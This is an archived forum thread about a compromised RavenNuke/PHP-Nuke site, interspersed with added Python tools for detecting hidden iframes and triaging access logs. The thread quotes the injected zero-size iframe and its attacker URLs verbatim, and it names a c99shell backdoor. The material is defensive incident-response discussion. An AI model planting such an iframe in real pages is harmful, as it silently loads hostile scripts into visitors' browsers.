Ravens PHP Scripts: Forums
Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
kevinkap
Involved
Joined: Apr 22, 2006
Posts: 356

Posted: Tue Apr 24, 2007 8:05 pm

wow, I was in the middle of uploading the php-manual and my site was compromised. Three files were altered somehow. Footer, header, and index.php all had an iframe tag added to the bottom of them containing this:

Code:
<iframe src='http://ayiosamvrosios.com/_tr/index.php' height=0 width=0 name='ad'>ad</iframe>

This is an rn2.10 site, with sentinel 2.5.06. Almost every setting is turned on. How would this be done and what is it?

Thanks

_________________
Kevin Kappes 
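An added example, not code from the thread, that scans template files for the zero-size iframe shape kevinkap describes (and covers fkelly's later advice to check standard files for alterations); SAMPLE_FOOTER is a constructed stand-in for the tampered footer.php, and only the src URL comes from the post.

```python
import re
from pathlib import Path

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# name=value with double, single or no quotes; the value lands in one of groups 2-4.
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

def parse_attrs(attr_text):
    """Return {name: value} for the attributes inside one tag."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs

def is_hidden(attrs):
    """Zero-size or CSS-hidden frames are the usual injection shape."""
    zero = {"0", "0px"}
    style = attrs.get("style", "").replace(" ", "").lower()
    return (attrs.get("height") in zero or attrs.get("width") in zero
            or "display:none" in style or "visibility:hidden" in style)

def find_hidden_iframes(text):
    """List every hidden iframe in text as {'line': n, 'src': url}."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        attrs = parse_attrs(m.group(1))
        if is_hidden(attrs):
            hits.append({"line": text.count("\n", 0, m.start()) + 1, "src": attrs.get("src", "")})
    return hits

def scan_tree(root, suffixes=(".php", ".html", ".htm", ".tpl")):
    """Walk a web root and map each affected file to its hidden-iframe hits."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = find_hidden_iframes(path.read_text(errors="replace"))
            if hits:
                findings[str(path)] = hits
    return findings

# Constructed stand-in for the tampered footer.php; the src is the one quoted in the thread.
SAMPLE_FOOTER = """<?php
echo "</div></body></html>";
?>
<iframe src='http://ayiosamvrosios.com/_tr/index.php' height=0 width=0 name='ad'>ad</iframe>
"""

if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_FOOTER):
        print(f"line {hit['line']}: hidden iframe -> {hit['src']}")
```

Run `scan_tree("/path/to/webroot")` to sweep a whole install; any file it reports should be diffed against a clean copy of that RavenNuke release.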
jaded
Theme Guru
Joined: Nov 01, 2003
Posts: 1006

Posted: Tue Apr 24, 2007 8:11 pm

What addons do you have installed on this site? Was it a pure RN site to start with or an upgrade or downgrade from another version of nuke?

evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221

Posted: Tue Apr 24, 2007 8:17 pm

Time to get some access logs and go searching. If your Sentinel database is still there and you have the tracking enabled, look at those logs too.

Are you using any addons with known security problems... vWar, Coppermine, etc?

_________________
- Star Wars Rebellion Network -

Need help? Nuke Patched Core, Coding Services, Webmaster Services 
kevinkap

Posted: Tue Apr 24, 2007 9:07 pm

It was a fresh install of rn files and an upgraded db from rn7.6.2.02.

I have g2 2.1.1 installed, ns contact plus2.4, an address list module that simply gives all members in an address list manner, Sommaire 3 from montego, gcalender 1.4.1 from gremmie, montego's approve membership lite, subscription 2.0 module from western studios. I did have to edit the header file for the subscription mod. I had to add

Code:
//remove subscribers mod
require 'modules/Subscription/includes/remove_subscr.php';

to it.

Sentinel showed the ip in the tracked db so I added it to the blocked list.

I am having my host look at the logs.

I forgot, I had uploaded php manual, php nuke how to, pear manual, nuke tools3. I believe I was in the middle of uploading the php manual when it happened based on the time stamps.
 
jakec
Site Admin
Joined: Feb 06, 2006
Posts: 3048
Location: United Kingdom

Posted: Wed Apr 25, 2007 5:45 am

If Sentinel shows the IP in tracked ip section of Sentinel, you should also be able to see what strings they were using. Also if you know roughly the date and time it should help you, or your host to find it within your logs.
 
kevinkap

Posted: Wed Apr 25, 2007 6:12 am

Where exactly would I look for the strings? Just in the logs?

Thanks.
 
jakec

Posted: Wed Apr 25, 2007 6:28 am

When you go into 'Display Tracked IP's' you should see on the right-hand side four buttons, under the title 'Functions'.
Click on the 2nd button, which is called 'View'. This should open another window and display the strings the IP has used (hopefully).
 
kevinkap

Posted: Wed Apr 25, 2007 6:35 am

I had already added it to the blocked list. This is what it showed:

Blocked IP: 74.6.73.235
User:
Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; [ Only registered users can see links on this board! Get registered or login! ]
Blocked on: 2007-04-24 22:01:21
Notes: attached site
Reason: Abuse-Admin

Query String:
Get String:
Post String:
Forwarded For: none
Client IP: none
Remote Address: 74.6.73.235
Remote Port: 33702
Request Method: GET

under the strings, it shows this
[ Only registered users can see links on this board! Get registered or login! ]

That is an image in the gallery.

Doesn't tell me much really.
 
evaders99

Posted: Wed Apr 25, 2007 1:29 pm

That's it? Looks like it's just Yahoo's search bot. While there are some reports that it is theoretically possible to cause such an attack to come from search engines, I've not actually seen one.

That doesn't look like one you want.
 
fkelly
Former Moderator in Good Standing
Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY

Posted: Wed Apr 25, 2007 6:07 pm

I agree with Evaders. That string you posted looks like a standard Gallery link. I'd try to find the IP of ayiosamvrosios.com and look in your log for similar IPs. Do you have direct access to the log? A lot of these attacks come from similar IPs like 87.* or 83.*, and if you search your log for these you can narrow it down considerably. I'd find out what the first two digits of ayiosamvrosios.com are and try searching for IPs with their first two digits in your log.

Also, I'd check my directories for any strange new files or any standard ones that have been altered.
 
hitwalker
Sells PC To Pay For Divorce
Posts: 5661

Posted: Thu Apr 26, 2007 4:11 pm

OK, it was a bit of a search, but the address
Code:
http://ayiosamvrosios.com/_tr/index.php


is pulling an iframe from here..
Code:
http://z72496.infobox.ru/index.php

calling a JavaScript..
explained here... [ Only registered users can see links on this board! Get registered or login! ]

I don't think Sentinel has anything to do with this.
 
gregexp
The Mouse Is Extension Of Arm
Joined: Feb 21, 2006
Posts: 1497
Location: In front of a screen....HELP! lol

Posted: Thu Apr 26, 2007 7:36 pm

If you don't mind me jumping in here,

Do you allow uploads of ANYTHING on your site??

I can't think of one thing that could be used to execute a command to write to a file within RavenNuke. Believe me when I say, I've tested every known and unknown exploit I could grab or create. Sentinel caught almost all of the known ones and a few of the ones I made.

But 100% of them FAILED; even session manipulation took a dive.

Check all access logs that should be available to you in your control panel, and look for accesses that match NOTHING on your site.

For example, accesses like [ Only registered users can see links on this board! Get registered or login! ]

If you pulled it, see if there is a 404 error at the same time it was accessed (error logs).

It is my belief that you were backdoored, with something like a c99shell script.

The real problem is that I converted file types and hacked it enough to where I could upload it, but I had to hack it so much that the server would not allow execution in order to properly use such a script.

I hope that you find what you are looking for, and I'm sure that this is a backdoor issue and not an exploit of RN.

_________________
For those who stand shall NEVER fall and those who fall shall RISE once more!! 
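An added example, not from the thread, that does the access-log triage evaders99, fkelly and gregexp describe: keep only requests within a window around the tampered file's modification time, then flag 404s and paths the site does not serve. KNOWN_PREFIXES, MTIME and the log lines are constructed; 74.6.73.235 is the Yahoo bot address quoted in the thread.

```python
import re
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" log prefix; the query string stays attached to the path.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+')

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def triage(lines, known_prefixes, mtime, window=timedelta(minutes=15)):
    """Requests within +/-window of the tampered file's mtime that are 404s or touch
    paths the site does not serve. Returns (ip, path, status, reason) tuples."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or abs(rec["ts"] - mtime) > window:
            continue
        bare = rec["path"].split("?", 1)[0]
        reasons = []
        if rec["status"] == 404:
            reasons.append("404")
        if not any(bare.startswith(p) for p in known_prefixes):
            reasons.append("unknown path")
        if reasons:
            hits.append((rec["ip"], rec["path"], rec["status"], ", ".join(reasons)))
    return hits

# Constructed sample: paths a stock install serves (assumption), the footer.php mtime,
# and five made-up log lines; 74.6.73.235 is the thread's Yahoo bot and is benign here.
KNOWN_PREFIXES = ("/index.php", "/modules.php", "/images/", "/themes/", "/includes/")
MTIME = datetime(2007, 4, 24, 22, 0, 0, tzinfo=timezone(timedelta(hours=-6)))
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Apr/2007:21:57:40 -0600] "GET /modules.php?name=Forums HTTP/1.1" 200 8120',
    '198.51.100.23 - - [24/Apr/2007:21:58:03 -0600] "GET /cgi-bin/tmp/upload.php HTTP/1.1" 404 221',
    '198.51.100.23 - - [24/Apr/2007:21:59:10 -0600] "GET /uploads/tmp.php HTTP/1.1" 200 412',
    '74.6.73.235 - - [24/Apr/2007:22:01:21 -0600] "GET /modules.php?name=gallery2 HTTP/1.1" 200 5431',
    '192.0.2.9 - - [24/Apr/2007:18:30:00 -0600] "GET /nothere.php HTTP/1.1" 404 221',
]

if __name__ == "__main__":
    for ip, path, status, why in triage(SAMPLE_LOG, KNOWN_PREFIXES, MTIME):
        print(f"{ip} {status} {path}  <- {why}")
```

The 404 at 18:30 is dropped because it falls outside the window; widen `window` if the file timestamps are unreliable.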
Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours